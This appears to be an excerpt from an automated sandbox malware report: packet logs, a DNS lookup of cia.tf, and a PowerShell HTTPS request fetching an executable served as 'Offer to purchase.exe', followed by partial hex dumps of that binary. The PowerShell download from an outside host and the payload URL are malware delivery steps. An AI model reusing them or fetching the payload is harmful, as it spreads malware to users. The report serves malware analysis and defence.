                                                                                              Nov 25, 2024 14:58:09.722909927 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.727421045 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.727493048 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.736583948 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.736658096 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.745115995 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.745225906 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.753729105 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.753814936 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.758150101 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.758218050 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.766119957 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.766191006 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.770293951 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.770358086 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.777621031 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.777694941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.785062075 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.785140038 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.792558908 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.792654991 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.796473980 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.796533108 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.804003954 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.804071903 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.842175007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.842195988 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.842271090 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.845947981 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.845957994 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.845971107 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.846028090 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.846035004 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.846048117 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.846079111 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.847460985 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.847507954 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.854979992 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.855031967 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.862251043 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.862318039 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.866152048 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.866214037 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.929125071 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.929219007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.934823036 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.934878111 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.937874079 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.937935114 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.943541050 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.943591118 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.949304104 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.949372053 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.963843107 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.963912964 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.175347090 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.175503016 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.233722925 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.233763933 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.233828068 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348701954 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348721027 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348737001 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348788023 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348794937 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348810911 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348815918 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348826885 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348840952 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348846912 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348862886 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348881006 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348913908 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.455487967 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.455502033 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.455570936 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462538004 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462546110 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.462563038 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.462631941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462666988 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.590671062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.590679884 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.590707064 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.590795994 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.663980007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.664001942 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.664026022 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.664117098 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.664140940 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856764078 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856775999 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856807947 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856827974 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856909990 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856909990 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918056011 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918066025 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.918101072 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.918210983 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918210983 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.987962961 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.987971067 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.987983942 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.988045931 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.988090992 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043010950 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043015957 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043032885 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043049097 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043179989 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043179989 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203341961 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203355074 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.203370094 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.203432083 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203500032 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252011061 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252031088 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252044916 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252063036 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252111912 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252156019 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252187014 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.377979040 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.377995968 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.378016949 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.378083944 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.378118992 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453567028 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453577995 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453588963 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453610897 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453768969 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453768969 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.486496925 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.486507893 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.486524105 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.486743927 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514077902 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514090061 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514101982 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514112949 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514301062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514301062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.555260897 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.555268049 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.555310011 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.555470943 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.579334021 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.579339981 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.579355001 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.579370975 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.579428911 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.579587936 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.619009018 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.619015932 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.619038105 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.619225979 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.647227049 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.647233009 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.647253990 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.647268057 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.647334099 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.647430897 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.686645031 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.710829020 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.819494009 CET49161443192.168.2.22172.67.129.178

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Nov 25, 2024 14:58:06.602324963 CET5456253192.168.2.228.8.8.8
                                                                                              Nov 25, 2024 14:58:06.865701914 CET53545628.8.8.8192.168.2.22

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Nov 25, 2024 14:58:06.602324963 CET192.168.2.228.8.8.80x410aStandard query (0)cia.tfA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Nov 25, 2024 14:58:06.865701914 CET8.8.8.8192.168.2.220x410aNo error (0)cia.tf172.67.129.178A (IP address)IN (0x0001)false
                                                                                              Nov 25, 2024 14:58:06.865701914 CET8.8.8.8192.168.2.220x410aNo error (0)cia.tf104.21.1.182A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • cia.tf

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249161172.67.129.1784433604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-25 13:58:08 UTC186OUTGET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                                                              Host: cia.tf
                                                                                              Connection: Keep-Alive
                                                                                              2024-11-25 13:58:09 UTC972INHTTP/1.1 200 OK
                                                                                              Date: Mon, 25 Nov 2024 13:58:08 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1072096
                                                                                              Connection: close
                                                                                              Cache-Control: public, max-age=14400
                                                                                              content-disposition: attachment; filename="Offer to purchase.exe"
                                                                                              etag: W/"105be0-1934e18f460"
                                                                                              last-modified: Thu, 21 Nov 2024 09:41:18 GMT
                                                                                              x-powered-by: Express
                                                                                              CF-Cache-Status: MISS
                                                                                              Accept-Ranges: bytes
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsQQcYbRBXcBgL%2BGMPFaVd7dxXdezdtRN%2FEsQ7RMhxtdTjB0EgA74733iSVPk7DAbJBoyai24TqJTYTte%2FA48I0CyGrcMzjqUVhjGi%2BOYJpfnoCU0nKZMXM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e8226debc65c427-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=800&delivery_rate=1830721&cwnd=243&unsent_bytes=0&cid=8319d40ba48bf31d&ts=967&x=0"
                                                                                              2024-11-25 13:58:09 UTC397INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fe ff 3e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 f2 0f 00 00 4a 00 00 00 00 00 00 ae 10 10 00 00 20 00 00 00 20 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 10 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>gJ @ `
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 46 00 00 00 20 10 00 00 48 00 00 00 f4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 10 00 00 02 00 00 00 3c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 10 10 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 71 0f 00 88 9e 00 00 03 00 00 00 01 00 00 06 00 b5 00 00 d4 bc 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 8d 43 bf 3a b0 18 bf 9d 67 7c be 00 00 00 00 b9 c7 ca 3e 7e 8e 67 3f e3 dd 21 be 00 00 00 00 74 7d ff be f2 d2 5d bf 0b aa 57 bc 00 00 00 00 98 fc ef 3e 36 23 53 bf 1a f8 a1 3e
                                                                                              Data Ascii: `.rsrcnF H@@.reloc<@BHq?C:g|>~g?!t}]W>6#S>
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 51 3f 2c 2c b8 be 00 00 00 00 38 2e b3 3e 1f 49 41 3f a5 f3 0d bf 00 00 00 00 81 40 7f bf 62 48 13 bd ce 07 8a 3d 00 00 00 00 66 c1 dc be 6f 0e 17 be c2 df 63 bf 00 00 00 00 76 6b 99 3e ae 9e 23 bf 33 54 35 3f 00 00 00 00 38 49 cb 3e d9 07 11 3f 7f da 38 bf 00 00 00 00 1e a3 00 bf e8 69 e0 3e 71 c8 3e bf 00 00 00 00 e8 be 8c 3d 34 4c b5 3e 1e c4 6e 3f 00 00 00 00 7b 3c 43 bd 84 d9 ec be 1a a2 62 3f 00 00 00 00 ab 42 63 be d5 96 66 3f 0e 2c bf be 00 00 00 00 6e c3 74 bf 9c 17 67 be e1 60 3f 3e 00 00 00 00 4b 21 40 be fc 70 c8 3e 3d 9e 66 bf 00 00 00 00 0b 97 65 be c4 7c a1 be 17 0e 6c 3f 00 00 00 00 2b 16 3b bf 4a 7d 09 bf 68 b2 d7 3e 00 00 00 00 e3 a4 10 bd 66 16 51 bf 09 6f 13 3f 00 00 00 00 00 ff 70 bf 21 3d 35 3e b8 05 93 be 00 00 00 00 ca df 1d be 1c
                                                                                              Data Ascii: Q?,,8.>IA?@bH=focvk>#3T5?8I>?8i>q>=4L>n?{<Cb?Bcf?,ntg`?>K!@p>=fe|l?+;J}h>fQo?p!=5>
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 00 10 88 b1 bd 4b e5 55 3f 69 e5 0a bf 00 00 00 00 60 56 6c 3f 7c 99 08 3e fc 8b b8 be 00 00 00 00 c5 73 78 3b 94 69 84 be f1 49 77 3f 00 00 00 00 2a e2 74 3e a6 09 7b 3e c7 84 70 bf 00 00 00 00 32 3c 42 3f 90 4d 0e bf 5d e1 ad 3e 00 00 00 00 c5 38 97 3e 7d 78 9e 3e 80 63 67 3f 00 00 00 00 aa 96 59 3d ba f7 68 bf d8 7e d2 be 00 00 00 00 af 78 8a 3e d9 f4 bb 3c c7 63 76 bf 00 00 00 00 51 4a 10 3f c6 da 04 3d 90 4c 53 3f 00 00 00 00 ec 13 20 3e ee ed 16 3e 79 05 7a 3f 00 00 00 00 67 fe 27 bd d1 58 7b 3f a4 c1 3d 3e 00 00 00 00 62 68 c5 be 37 8b 13 bf fb 74 38 bf 00 00 00 00 c4 cc c6 3e 72 89 67 3f 5e f1 34 3e 00 00 00 00 49 10 72 3f d4 7c 45 be 00 38 86 be 00 00 00 00 6a 31 58 3f 5e 2b 05 3f 7c 61 02 3e 00 00 00 00 a5 88 07 3d 65 c6 7f 3f b6 f2 d2 bc 00 00
                                                                                              Data Ascii: KU?i`Vl?|>sx;iIw?*t>{>p2<B?M]>8>}x>cg?Y=h~x><cvQJ?=LS? >>yz?g'X{?=>bh7t8>rg?^4>Ir?|E8j1X?^+?|a>=e?
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: c0 2b b8 3d 00 00 00 00 16 a3 fe be d4 9a 36 3e 29 5a 59 3f 00 00 00 00 64 20 cf bd bc 23 7b bf cd 72 29 3e 00 00 00 00 58 8d 05 bf c3 af 62 3d 5a f1 59 bf 00 00 00 00 39 43 49 bf d6 74 15 bf d2 8a 4f 3e 00 00 00 00 5b b0 10 bf 49 65 52 3f a9 5c 92 bd 00 00 00 00 c6 33 e0 3e a6 42 1c 3e a7 cf 62 bf 00 00 00 00 55 87 6c bf 90 f5 b4 3e c6 dc 15 be 00 00 00 00 13 48 59 3e 75 ae 50 bf df f9 09 bf 00 00 00 00 98 f8 5b bf c3 d8 12 3e 7f 67 fb be 00 00 00 00 4f c9 7d 3f 07 0b e7 3d 9c 45 89 3d 00 00 00 00 b5 65 0a 3d 23 da 7a bf ab 5f 49 be 00 00 00 00 97 00 00 00 a0 00 00 00 89 00 00 00 5b 00 00 00 5a 00 00 00 0f 00 00 00 83 00 00 00 0d 00 00 00 c9 00 00 00 5f 00 00 00 60 00 00 00 35 00 00 00 c2 00 00 00 e9 00 00 00 07 00 00 00 e1 00 00 00 8c 00 00 00 24 00 00
                                                                                              Data Ascii: +=6>)ZY?d #{r)>Xb=ZY9CItO>[IeR?\3>B>bUl>HY>uP[>gO}?=E=e=#z_I[Z_`5$
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 00 00 00 00 00 00 00 ff ff ff ff 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00 00 00 00 01 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 01 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 01 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00 00 00 00
                                                                                              Data Ascii:
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 7f 2a 1a 22 ff ff 7f ff 2a 1e 02 7b 18 00 00 04 2a 22 02 03 7d 18 00 00 04 2a 1e 02 7b 17 00 00 04 2a 22 02 03 7d 17 00 00 04 2a 1e 02 7b 14 00 00 04 2a 22 02 03 7d 14 00 00 04 2a 1e 02 7b 19 00 00 04 2a 1e 02 7b 16 00 00 04 2a 1e 02 7b 15 00 00 04 2a 22 02 03 7d 15 00 00 04 2a a2 03 16 3f 07 00 00 00 04 16 3c 0b 00 00 00 72 4b 01 00 70 73 40 00 00 0a 7a 02 04 7d 16 00 00 04 02 03 7d 19 00 00 04 2a 1e 02 7b 1b 00 00 04 2a 1e 02 7b 1a 00 00 04 2a 1e 02 7b 1c 00 00 04 2a 1e 02 7b 1d 00 00 04 2a 86 02 28 5d 00 00 06 02 22 00 00 34 c3 22 00 00 34 43 22 00 00 20 c1 22 00 00 20 41 28 63 00 00 06 2a e2 03 04 3c 08 00 00 00 05 0e 04 44 0b 00 00 00 72 95 01 00 70 73 40 00 00 0a 7a 02 03 7d 1a 00 00 04 02 04 7d 1c 00 00 04 02 05 7d 1b 00 00 04 02 0e 04 7d 1d 00 00
                                                                                              Data Ascii: *"*{*"}*{*"}*{*"}*{*{*{*"}*?<rKps@z}}*{*{*{*{*(]"4"4C" " A(c*<Drps@z}}}}
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 02 7b 3c 00 00 04 03 6f c3 00 00 06 2a 8a 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 02 7b 3d 00 00 04 03 04 6f b1 00 00 06 2a b6 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 05 02 7b 37 00 00 04 5a 10 03 02 7b 3e 00 00 04 03 04 05 6f 87 00 00 06 2a ea 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 05 02 7b 37 00 00 04 5a 10 03 0e 04 02 7b 37 00 00 04 5a 10 04 02 7b 3f 00 00 04 03 04 05 0e 04 6f c2 00 00 06 2a ba 02 28 ae 00 00 06 02 22 00 00 00 40 7d 38 00 00 04 02 22 00 00 80 3f 7d 3b 00 00 04 02 22 66 66 66 3f 7d 40 00 00 04 02 28 b0 00 00 06 2a 1e 02 7b 47 00 00 04 2a 22 02 03 7d 47 00 00 04 2a 1e 02 7b 48 00 00 04 2a 22 02 03 7d 48 00 00 04 2a 4a 02 22 00 00 80 3f 7d 47 00 00 04 02 28 ae 00 00 06 2a 22 02
                                                                                              Data Ascii: {<o*{7Z{7Z{=o*{7Z{7Z{7Z{>o*{7Z{7Z{7Z{7Z{?o*("@}8"?};"fff?}@(*{G*"}G*{H*"}H*J"?}G(*"
